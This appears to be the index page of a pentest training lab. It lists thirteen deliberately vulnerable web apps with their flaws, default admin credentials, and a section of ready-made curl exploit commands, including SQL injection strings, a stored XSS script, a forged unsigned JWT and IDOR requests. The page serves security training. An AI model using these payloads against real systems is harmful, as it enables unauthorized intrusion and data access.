⚡ Vulnerable Lab

Pentest training environment — 10 vulnerable applications

cahyo.web.id

📋 App List

# Name URL Technologies Level Vulns
1 Vulnerable News Portal portal-vuln.cahyo.web.id Nginx, PHP, MySQL Beginner
SQLiXSS
2 Vulnerable WordPress 5.0 wp-vuln.cahyo.web.id Nginx, WordPress, MySQL Beginner
Upload RCESQLi
3 Vulnerable WordPress 4.7 wps-vuln.cahyo.web.id Nginx, WordPress, MySQL Beginner
Stored XSS
4 Vulnerable Library lib-vuln.cahyo.web.id Nginx, Python, SQLite Beginner
SQLiIDOR
5 Vulnerable Ticket ticket-vuln.cahyo.web.id Nginx, PHP, MySQL Beginner++
SQLiUpload RCEIDOR
6 Vulnerable Jobseeker jobportal-vuln.cahyo.web.id VueJS, Golang, MySQL Beginner++
SQLiPath Trav
7 Vulnerable API api-vuln.cahyo.web.id Nginx, Python, SQLite Intermediate
JWT NoneIDOR
8 Vulnerable API Auth loginapi-vuln.cahyo.web.id Nginx, Python, SQLite Beginner++
JWT WeakUser Enum
9 Vulnerable Server server-vuln.cahyo.web.id Metasploitable 2 Intermediate
Many Vulns
10 OWASP Juice Shop juice-vuln.cahyo.web.id Node.js, Express, SQLite Intermediate
SQLiXSSRCE
11 WebGoat webgoat-vuln.cahyo.web.id Java, Spring Boot Intermediate
SQLiXSSRCE
12 WebWolf webwolf-vuln.cahyo.web.id Java, Spring Boot Beginner
File Upload
13 Vulnerable Laravel laravel-vuln.cahyo.web.id PHP, Laravel 5, MySQL Intermediate
SQLiRCEDeser

🔐 Credentials

AppUsernamePasswordNote
WordPress 5.0adminadmin123wp-vuln.cahyo.web.id/wp-admin
WordPress 4.7adminadmin123wps-vuln.cahyo.web.id/wp-admin

🎯 Quick Exploit Commands

# SQLi Portal
curl "http://portal-vuln.cahyo.web.id/?id=1' OR '1'='1"

# WP 5.0 - SQLi
curl "http://wp-vuln.cahyo.web.id/wp-content/plugins/vuln-sqli/vuln-sqli.php?id=1' OR '1'='1"

# WP 4.7 - Stored XSS
curl -X POST "http://wps-vuln.cahyo.web.id/wp-content/plugins/vuln-guestbook/vuln-guestbook.php" \
  -d "name=<script>alert(1)</script>&message=test&submit=Submit"

# Library - IDOR
curl "http://lib-vuln.cahyo.web.id/books/1" -H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyX2lkIjoxLCJyb2xlIjoidXNlciJ9.xxxxx"

# API - JWT None Algorithm
curl -H "Authorization: Bearer eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJ1c2VyIjoiYWRtaW4ifQ." http://api-vuln.cahyo.web.id/admin

# LoginAPI - User Enumeration
curl -X POST "http://loginapi-vuln.cahyo.web.id/login" \
  -H "Content-Type: application/json" \
  -d '{"username":"admin","password":"wrong"}'

# Metasploitable - Port Scan
nmap server-vuln.cahyo.web.id
⚠️ Warning: This is a deliberately vulnerable environment for authorized pentest training only. Do not deploy publicly without proper isolation.

Vulnerable Lab - @cahyodarujati, Ditenagai oleh: Cybersecurity Indonesia, Didukung oleh: PT. Radnet Digital Indonesia